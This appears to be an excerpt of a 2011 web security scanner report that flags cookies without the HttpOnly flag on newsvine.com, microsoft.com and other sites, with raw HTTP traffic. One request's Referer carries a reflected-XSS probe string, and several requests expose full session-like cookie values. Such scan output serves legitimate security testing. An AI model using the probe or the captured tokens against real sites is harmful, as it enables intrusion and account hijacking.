GET /favicon.ico HTTP/1.1 Host: www.hoovers.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HID=10.1.1.227.122391296352471936; BIGipServerholpriv-colo1=1342243082.20480.0000; BIGipServerwww-1=1341968906.20480.0000; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:54:56 GMT Server: Apache Last-Modified: Fri, 09 Oct 2009 00:43:07 GMT ETag: "e36" Accept-Ranges: bytes Content-Length: 3638 Content-Type: text/plain; charset=UTF-8 Set-Cookie: BIGipServerhaspriv-colo1=251384330.20480.0000; path=/ P3P: CP="NON DSP COR ADM DEV CONo TELo DELo SAMo OTRo UNRo LEG PRE"
The following cookie was issued by the application and does not have the HttpOnly flag set:
kdk23kds=m0cul2o9mqitm9hr94f71kgc03; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.interactivedata-rts.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.live.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; LD=3871a7c5-0acf-46b1-b76d-faebaecf0536_00d7c3a81b1_15501_1294800676304=L5708&3871a7c5-0acf-46b1-b76d-faebaecf0536_00e1e3469a5_15501_1294800680668=L3088|U46904782&3871a7c5-0acf-46b1-b76d-faebaecf0536_00ea893c9b1_15501_1294800680555=L3271~sw:1920~sh:1200~c:16~bw:1142~bh:750&3871a7c5-0acf-46b1-b76d-faebaecf0536_00a12627c20_15501_1294800670164=U46914446&3871a7c5-0acf-46b1-b76d-faebaecf0536_004401fc3dc_15501_1294800633344=U46951808&3871a7c5-0acf-46b1-b76d-faebaecf0536_00b4d7765d1_15501_1294800671751=U46913589
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wrep ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /web/gallery/install.aspx HTTP/1.1 Host: www.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; msdn=L=1033; omniID=1294458843112_6a73_9555_4be9_86ce555049db; ixpLightBrowser=0; WT_NVR_RU=0=technet:1=:2=; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-UA-Compatible: IE=EmulateIE8 X-AspNet-Version: 4.0.30319 Set-Cookie: WebLanguagePreference=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ VTag: 279537540800000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:30:55 GMT Content-Length: 74237
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
fp=015129635244395354; expires=Sun May 21 02:00:00 2025; domain=.morningstar.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.morningstar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /id/8004316/?from=en-us_msnhp HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:13:58 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 55258
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/article/emailThis HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:40 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=303dface27cc204606d11d8c52727498; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 2 Content-Type: text/html; charset=UTF-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_action/user/logout HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:40 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=db35f4d8c2ee469511377500991f260f; expires=Sat, 25-Jan-2031 01:22:40 GMT; path=/; domain=.newsvine.com Pragma: no-cache Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 01:22:44 GMT; path=/; domain=.newsvine.com Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F412586518 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/user/startTracking HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:46 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=fd03e0f2b9d7ca49ce9718040d6e1a3e; expires=Sat, 25-Jan-2031 01:22:46 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 1 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_action/user/stopTracking HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:41 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=da0aaca01f1bdb2b9d0331ebe22cd506; expires=Sat, 25-Jan-2031 01:22:41 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Length: 1 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_api/comments/getComments HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:32 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=dd4c8a8b287a263f2b369a781f45cf81; expires=Sat, 25-Jan-2031 01:22:32 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:32 GMT Content-Length: 65 Content-Type: application/json Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_api/question/getUserData HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:30 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:30 GMT; path=/; domain=.newsvine.com Set-Cookie: sprout=2_ETgH90q4mmpKrplAT%2FojPtfDv1tyMX8UV6jlrOysUd90BKEDCm0aoi0FwxnpYVKWleRFa3Ulo4SKWGMb99RplWdwKeghAoVrr8K20BurdgW%2FkEpl32D30gpAMgzDVH6lNk1PtyVKm3uSNcZbTeNwkkZW4QvNCRwjcsUWpNAqkpfEe%2FMdFu9IgMgjhg%2FOnTqFcJdXLKqNulF%2FWPxaXGSIyL1DRHmhet5xnv7IJBHm3l2dcMmGTV2QrfJPwX%2BHl10n; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com Set-Cookie: vid=b6d269731f7b23d3d635e08d43a4e32a; expires=Sat, 25-Jan-2031 01:22:35 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:30 GMT Content-Length: 244 Content-Type: application/json Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_api/user/convTracker HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:37 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=9dec2eaf0c58fea05fb0af38815eba6e; expires=Sat, 25-Jan-2031 01:22:37 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:37 GMT Content-Length: 304 Content-Type: application/json Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/newsvine/emailAlerts HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 03:13:08 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=18a3a9b666afd80ee07c9bbefeb2196f; expires=Sat, 25-Jan-2031 03:13:08 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/accounts/newsvine/emailAlerts Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:26 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=97b5abf04012c58b24dcf031f2dd315f; expires=Sat, 25-Jan-2031 01:22:26 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/api/accounts/login Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_tools/user/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:04 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 17589
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_vine/js/m1/global.js?v=23247 HTTP/1.1 Host: www.newsvine.com Proxy-Connection: keep-alive Referer: http://wbenedetti.newsvine.com/?2efa1%22-alert(1)-%22fb67b00e4a1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; vid=45f73cc22cc66ac775a363e022c73cd5
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:20:53 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:20:53 GMT; path=/; domain=.newsvine.com Pragma: no-cache Cache-Control: max-age=604800 Expires: Sun, 06 Feb 2011 17:20:53 GMT Content-Length: 383 Content-Type: text/javascript
var globalPokeURL = 'http://log.newsvine.com/poke.gif'; var globalImgRoot = 'http://www.newsvine.com/_vine/images/_/'; var globalRegisterRoot = 'https://www.newsvine.com/_nv/accounts/register'; v ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.newsvine.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 17:02:03 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Keep-Alive: timeout=3, max=999 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 56108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /_action/user/logout HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 03:20:10 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com Pragma: no-cache Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/global/information HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:45 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:14:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/msnbc/newsletters HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:00 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 41168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/accounts/register HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 11769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Ty ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:51 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com Cache-Control: max-age=60 Expires: Sun, 30 Jan 2011 01:23:51 GMT Vary: Accept-Encoding Content-Length: 97 Content-Type: application/json Connection: close
{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /_nv/api/accounts/resetPassword HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
